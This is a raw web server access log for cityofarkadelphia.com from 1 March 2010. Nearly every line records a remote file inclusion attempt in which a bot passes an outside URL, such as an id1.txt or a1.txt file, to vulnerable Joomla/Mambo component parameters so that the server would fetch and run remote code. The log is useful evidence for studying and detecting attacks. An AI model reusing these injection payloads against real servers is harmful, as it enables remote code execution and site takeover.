72.55.148.208 - - [01/Mar/2010:00:13:27 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:13:27 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.55.148.208 - - [01/Mar/2010:00:13:36 -0800] "GET /logs/access_090301.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:28:55 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:28:55 -0800] "GET /logs/access_091031.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.239.124.204 - - [01/Mar/2010:00:28:55 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:29:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:29:57 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:29:57 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:30:00 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:30:00 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:30:00 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:30:31 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:30:31 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:30:31 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [01/Mar/2010:00:31:37 -0800] "GET /logs/access_091101.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:33:17 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:33:18 -0800] "GET /logs/access_090401.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:33:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:00:34:44 -0800] "GET /logs/access_100201.log/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:00:34:44 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:00:34:44 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:35:25 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:35:25 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:35:25 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:37:49 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:37:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:37:49 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:00:37:57 -0800] "GET /logs/access_091201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
206.123.108.110 - - [01/Mar/2010:00:40:08 -0800] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
206.123.108.110 - - [01/Mar/2010:00:40:08 -0800] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
206.123.108.110 - - [01/Mar/2010:00:40:08 -0800] "GET /logs/access_090501.log//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
206.123.108.110 - - [01/Mar/2010:00:40:08 -0800] "GET /logs/access_090329.log//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.39.137.162 - - [01/Mar/2010:00:45:33 -0800] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.39.137.162 - - [01/Mar/2010:00:45:33 -0800] "GET /logs/access_090501.log//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.39.137.162 - - [01/Mar/2010:00:45:33 -0800] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.39.137.162 - - [01/Mar/2010:00:45:33 -0800] "GET /logs/access_090329.log//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.westchesterinvisalign.com/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.25.99 - - [01/Mar/2010:00:56:24 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
222.122.25.99 - - [01/Mar/2010:00:56:27 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
207.46.195.241 - - [01/Mar/2010:01:01:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.195.241 - - [01/Mar/2010:01:02:44 -0800] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:08:45 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:08:45 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:08:45 -0800] "GET /logs/access_081230.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:46 -0800] "GET /logs/access_090401.log//aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:46 -0800] "GET /aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:46 -0800] "GET /logs//aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:58 -0800] "GET /aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:58 -0800] "GET /logs/access_090401.log//aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:01:13:58 -0800] "GET /logs//aedatingCMS.php?dir[inc]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:38 -0800] "GET /logs//aedatingCMS.php?dir[inc]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:38 -0800] "GET /aedatingCMS.php?dir[inc]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:38 -0800] "GET /logs/access_090401.log//aedatingCMS.php?dir[inc]=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:55 -0800] "GET /logs/access_090101.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:55 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:01:19:55 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:23:56 -0800] "GET /logs/access_090101.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:23:56 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:23:56 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:24:05 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:24:06 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:01:24:07 -0800] "GET /logs/access_090101.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:01:42:19 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:01:42:19 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:01:42:19 -0800] "GET /logs/access_090701.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:01:43:56 -0800] "GET /logs/access_090701.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:01:43:56 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:01:51:47 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:01:51:47 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:54:13 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:54:13 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:54:13 -0800] "GET /logs/access_081230.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:54:19 -0800] "GET /logs/access_090901.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:01:54:32 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:01:54:32 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:54:59 -0800] "GET /index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:54:59 -0800] "GET /logs/access_100201.log/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:54:59 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:00 -0800] "GET /logs/access_090601.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:00 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:02 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:12 -0800] "GET /logs/access_090201.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:26 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:26 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:26 -0800] "GET /logs/access_090330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:30 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:30 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
84.40.30.37 - - [01/Mar/2010:01:55:30 -0800] "GET /logs/access_090330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:55:52 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:55:52 -0800] "GET /index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:55:52 -0800] "GET /logs/access_100201.log/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:57 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:57 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:55:58 -0800] "GET /logs/access_090601.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:56:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:56:02 -0800] "GET /logs/access_090601.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:56:02 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:56:08 -0800] "GET /logs/access_100201.log/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:56:08 -0800] "GET /index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.110.50.120 - - [01/Mar/2010:01:56:08 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&func=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:56:08 -0800] "GET /logs/access_090201.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:15 -0800] "GET /logs/access_090901.log//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:01:56:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:01:56:22 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
